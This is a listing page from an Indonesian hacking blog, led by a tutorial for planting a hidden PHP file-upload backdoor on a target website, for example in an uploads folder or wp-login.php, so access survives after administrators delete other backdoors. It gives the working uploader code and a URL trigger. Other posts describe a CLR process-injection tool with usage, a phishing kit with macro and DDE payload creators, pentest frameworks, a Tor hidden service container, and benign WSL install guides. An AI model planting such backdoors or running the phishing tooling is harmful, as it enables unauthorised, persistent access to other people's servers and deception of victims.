News Ticker

Latest Posts

Cara Memasang Script Hidden Uploader di Website

- Thursday, November 22, 2018 No Comments
Cara Memasang Script Hidden Uploader di Website -  Kali ini kita akan bahas memasang Script Hidden Uploader pada website Target kita agar tidak kehilangan akses.

Hidden Uploader Php Script
Biasanya digunakan untuk menyembunyikan uploader kita jadi saya biasanya menamai file tersebut index.php. Langsung saja copy file berikut :
<?php
if(isset($_GET["uploader"]))
 {
  echo"<font color=#ffffff>".php_uname()."";
  print "\n";$disable_functions = @ini_get("disable_functions"); 
  echo "<br>DisablePHP=".$disable_functions; print "\n"; 
  echo"<br><form method=post enctype=multipart/form-data>"; 
  echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; 
    if($_POST["k"]==upload)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal uploa sayang";
}
} 
}
Misal kita menemukan target yang index.php-nya kosong contoh seperti berikut : 
http://target.com/wp-content/uploads
Lalu kita Upload file hidden uploader tadi yang kita namai index.php pada dir tempat yg index.php- kosong. Lalu kita buka:
http://target.com/wp-content/uploads/index.php
Akan terlihat kosong blank, untuk memanggil uploadernya, masukan query pada url nya menjadi seperti berikut:
http://target.com/wp-content/uploads/index.php?uploader
Maka akan terlihat uploadernya.
script hidden uploader backdoor
Metode ini biasanya digunakan untuk cadangan backdoor, jika backdoor kita sudah dihapus oleh administratornya kita masih bisa upload backdoor baru.

Oiya script uploader ini kuga bisa di masukan pada script lainnya, Tempat favorit saya adalah di wp-login.php jika targetnya wordpress ya. Jika targetnya beda kalian masukan di bagian login admin saja.

Clrinject - Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

- Wednesday, October 10, 2018 No Comments

Injects C# EXE or DLL Assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process's classes and therefore affect it's internal state.

Usage
clrinject-cli.exe -p <processId/processName> -a <assemblyFile>
Opens process with id <processId> or name <processName>, inject <assemblyFile> EXE and execute Main method.

Additional options
  • -e Enumerates all loaded CLR Runtimes and created AppDomains.
  • -d <#> Inject only into <#>-th AppDomain. If no number or zero is specified, assembly is injected into every AppDomain.
  • -i <namespace>.<className>Create an instance of class <className> from namespace <namespace>.

Examples

Usage examples
  • clrinject-cli.exe -p victim.exe -e
    (Enumerate Runtimes and AppDomains from victim.exe)
  • clrinject-cli.exe -p 1234 -a "C:\Path\To\invader.exe" -d 2
    (Inject invader.exe into second AppDomain from process with id 1234)
  • clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"
    (Create instance of Invader inside every AppDomain in victim.exe)
  • clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"
    (Inject x64 assembly into x64 process)

Injectable assembly example
Following code can be compiled as C# executable and then injected into a PowerShell process. This code accessees static instances of internal PowerShell classes to change console text color to green.
using System;
using System.Reflection;

using Microsoft.PowerShell;
using System.Management.Automation.Host;

namespace Invader
{
    class Invader
    {
        static void Main(string[] args)
        {
            try
            {
                var powerShellAssembly = typeof(ConsoleShell).Assembly;
                var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost");
                var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null);

                var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost);
                ui.RawUI.ForegroundColor = ConsoleColor.Green;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
        }
    }
}
Injection command:
clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"

Result:


Note: Tools ini belum kami uji, jika ada pertanyaan silahkan kunjungi langsung link di bawah ini.

ANDRAX - The First And Unique Penetration Testing Platform For Android Smartphones

- Tuesday, October 9, 2018 No Comments

ANDRAX The first and unique Penetration Testing platform for Android smartphones
What is ANDRAX
ANDRAX is a penetration testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful t

Docker TOR Hidden Service - Easily Setup A Hidden Service Inside The Tor Network

- No Comments
Easily run a hidden service inside the Tor network with this container
Generate the skeleton configuration for you hidden service, replace for your hidden service pattern name. Example, if you want to your hidden service contain the word 'boss', just use this word as argument. You can use regular expressions, like ^boss, will generate an address wich will start with 'boss'. Be aware that bigger the pattern, more time it will take to generate it.

docker run -it --rm -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx generate <pattern>
Create an container named 'hiddensite' to serve your generated hidden service
docker run -d --restart=always --name hiddensite -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx 

Example
Let's create a hidden service with the name beginning with strm.

docker pull strm/tor-hiddenservice-nginx
Wait to the container image be downloaded. And them we can generate our site skeleton:
$docker run -it --rm -v $(pwd)/web:/web strm/tor-hiddenservice-nginx generate ^strm
[+] Generating the address with mask: ^strm
[+] Found matching domain after 137072 tries: strmfyygjp5st54g.onion
[+] Generating nginx configuration for site  strmfyygjp5st54g.onion
[+] Creating www folder
[+] Generating index.html template
Now we have our skeleton generated, we can run the container with:
docker run -d --restart=always --name hiddensite \
       -v $(pwd)/web:/web strm/tor-hiddenservice-nginx
And you have the service running ! :)
Troubleshoot
  • 403 error on nginx, check your directory permissions and folder permissions. Nginx run as "hidden" user, his UID is 666, just check if you give this user access to the /web/www folder (in the case the folder mapped to it).
  • Build
    docker build -t strm/tor-hiddenservice-nginx .

    Run
    docker run -d --restart=always --name hiddensite
    -v $(pwd)/web:/web strm/tor-hiddenservice-nginx

    Shell
    docker run -it --rm -v $(pwd)/web:/web
    --entrypoint /bin/bash strm/tor-hiddenservice-nginx


     

Camelishing Social Engineering Tool

- Sunday, October 7, 2018 No Comments
Camelishing Social Engineering Tool - Camelishing adalah tool untuk melakukan social engineering atau biasa di sebut soceng, jika kalian tidak tau apa itu soceng, soceng adalah trik untuk memanipulasi (menipu) seseorang untuk menjebak dan mendapatkan informasi dari korban.

Camelishing Social Engineering Tool Tool Camelishing ini berjalan pada windows dengan menginstall python3, sebelum kalian menginstal tool ini kalian menginstall Python3 terlebih dahulu disini, dan tentunya kalian sudah mengintall Microsoft Office juga.

Selengkapnya tentang Camelishing Social Engineering Tool

Contact

[!]CONTACT[!]
| Coded Abdulaziz ALTUNTA┼× |
| Email: a.azizaltuntas@gmail.com |
| Github: github/azizaltuntas     |
| Twitter: @esccopyright          |

Features

1-Bulk email sending
2-Basic Python Agent Creator
3-Office Excel Macro Creator
4-DDE Excel Creator(or Custom Payload)
5-Return ─░nformation
 *[Mail Open Track]
 *[Agent Open Track]

6-AutoSave
7-Statistics Report
8-User Control

Installation Modules

$ pip install -r requirements.txt
$ Install Microsoft Office

If Installation Failed please try to

Install Python 3.6 & Pip3 (Just install Python 3.6 Pip already comes with it!)
Use pip3 to install the requirments 
-------------------------
$ pip3 install -r requirments.txt 

If you get Error to create Macro

Please follow the steps below! 
N|Solid N|Solid N|Solid N|Solid N|Solid

Tested and Supported

[+]Windows 7
[+]Windows 10

+SCREENSHOT

Mail Sender

[+] Note :  Compress and send the exe file(rar,zip)

[+] Start Project : python start.py
N|Solid

Macro Creator

N|Solid

Agent Creator

N|Solid

Agent

N|Solid

DDE Creator

N|Solid

General Setting

N|Solid

Mail Send

N|Solid

Open Mail

N|Solid

Return Information

N|Solid

Statistic Report

N|Solid

    DarkSpiritz - A Penetration Testing Framework For UNIX Systems

    - Saturday, October 6, 2018 No Comments

    What is DarkSpiritz?

    Created by the SecTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. DarkSpiritz is a re-vamp of the very popular framework known as "Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use metasploit setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins or you can head to our wiki here. If you need any help feel free to contact us at sectel.team@protonmail.com.
    Getting Started
    Clone the repository with git:
    git clone https://github.com/DarkSpiritz/DarkSpiritz.git
    DarkSpiritz wiki available here
    To install DarkSpiritz clone the github repo and run:
    sudo python installer.py
    This will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:
    python main.py
    from within the same directory as DarkSpiritz.
    You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

    Features:
    These are features that DarkSpiritz Team prides themself on based on this program:
    • Real Time Updating of Configuration
    • Never a need to restart the program even when adding plugins or editing them.
    • Easy to use UX
    • Multi-functionality

    Screenshots:




     

    Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked

    - Monday, September 24, 2018 No Comments

    Leaked? is A Checking tool for Hash codes and Passwords and Emails leaked, uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken.
    Leaked? can work in any OS if they have support Python 3 and 2.

    What's new?
    • Check email leaked
    • Update
    • More friendly for users
    • Support Python 2 and 3

    Features
    • Check passwords leaked
    • Check hash code leaked
    • Check email leaked NEW!
    • Update NEW!
    • Exit
    • About Author

    Install and Run in Linux
    sudo apt update && apt install python3 python3-pip
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip3 install -r requirements.txt
    pip install -r requirements.txt
    python3 leaked.py
    or python leaked.py

    Install and Run in Windows
    Download and run Python 3 setup file from Python.org. In Install Python 3 , enable Add Python 3.7 to PATH and For all users
    Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.
    After that, Run Command Propmt or PowerShell and enter this commands:
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip install -r requirements.txt
    python leaked.py

    Update Leaked?: git pull -f

    Notes
    Leaked? uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken
    Let follow their Twitter account!

    Screenshots




    Contact to Author

    Install the Windows Subsystem for Linux on Windows 10

    - Sunday, September 23, 2018 No Comments

    Enable the Windows Subsystem for Linux
       Before installing any Linux distros for WSL, you must ensure that the "Windows Subsystem for Linux" optional feature is enabled:

          Open PowerShell as Administrator and run:
          Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

       Restart your computer when prompted.

    Install your Linux Distribution of Choice
       To download and install your preferred distro(s), you have three choices:
        * Download and install from the Windows Store (see below)
        * Download and install from the Command-Line/Script (read the manual installation instructions)
        * Download and manually unpack and install (for Windows Server -instructions here)

    Windows 10 Fall Creators Update and later: Install from the Microsoft Store
     This section is for Windows build 16215 or later. Follow these steps to check your build. For earlier versions of Windows 10, follow these instructions using lxrun.

    1, Open the Microsoft Store and choose your favorite Linux distribution.
    Microsoft%2BStore%2BLinux

       The following links will open the Windows store page for each distribution:
        * Ubuntu
        * OpenSUSE
        * SLES
        * Kali Linux and Debian GNU/Linux

    2, From the distro's page, select "Get"
    Microsoft%2BStore%2BUbuntu

    Complete initialization of your distro
       Now that your Linux distro is installed, you must initialize your new distro instance once, before it can be used.

    Troubleshooting:
       Below are related errors and suggested fixes. Refer to the WSL troubleshooting page for other common errors and their solutions.

       Installation failed with error 0x80070003
        * The Windows Subsystem for Linux only runs on your system drive (usually this is your C: drive). Make sure that distros are stored on your system drive:
        * Open Settings -> Storage ->More Storage Settings: Change where new content is saved
    Troubleshooting


    Manually download Windows Subsystem for Linux distro packages

    - No Comments
    Windows Subsystem for Linux

    There are several scenarios in which you may not be able (or want) to, install WSL Linux distros via the Windows Store. Specifically, you may be running a Windows Server or Long-Term Servicing (LTSB/LTSC) desktop OS SKU that doesn't support Windows Store, or your corporate network policies and/or admins to not permit Windows Store usage in your environment.

    In these cases, while WSL itself is available, how do you download and install Linux distros in WSL if you can't access the store?

    Note:
     Command-Line shell environments including CMD,PowerShelland Linux/WSL distros are not permitted to run on Windows 10 S Mode. This restriction exists in order to ensure the integrity and safety goals that S Mode delivers: Read this post for more information.

    Downloading distros
       If the Windows Store app is not available, you can download and manually install Linux distros by clicking these links:
        * Ubuntu 18.04 and Ubuntu 18.04 ARM
        * Ubuntu 16.04
        * Debian GNU/Linux
        * Kali Linux
        * OpenSUSE
        * SLES

       This will cause the<distro>.appx packages to download to a folder of your choosing. Follow the installation instructions to install your downloaded distro(s).

    Downloading distros via the Command-Line
       If you prefer, you can also download your preferred distro(s) via the Command-Line:

       Download using PowerShell
          To download distros using PowerShell, use the Invoke-WebRequest cmdlet. Here's a sample instruction to download Ubuntu 16.04.
          Enter this following command:
          Invoke-WebRequest -Uri https://aka.ms/wsl-ubuntu-1604 -OutFile Ubuntu.appx -UseBasicParsing

          Tip:
     If the download is taking a long time, turn off the progress bar by setting$ProgressPreference = 'SilentlyContinue'

       Download using curl
          Windows 10 Spring 2018 Update (or later) includes the popular curl command-line utility with which you can invoke web requests (i.e. HTTP GET, POST, PUT, etc. commands) from the command-line. You can use curl.exe to download the above distro's. Oen Command Prompt and enter this command:
          curl.exe -L -o ubuntu-1604.appx https://aka.ms/wsl-ubuntu-1604

          In the above example,curl.exe is executed (not justcurl) to ensure that, in PowerShell, the real curl executable is invoked, not the PowerShell curl alias forInvoke-WebRequest.

          Note: Using curl might be preferable if you have to invoke/script download steps using Cmd shell and/or .bat / .cmdscripts.

    Installing your distro
       For instructions on how to install your downloaded distro(s), please refer to the Windows Desktop orWindows Server installation instructions.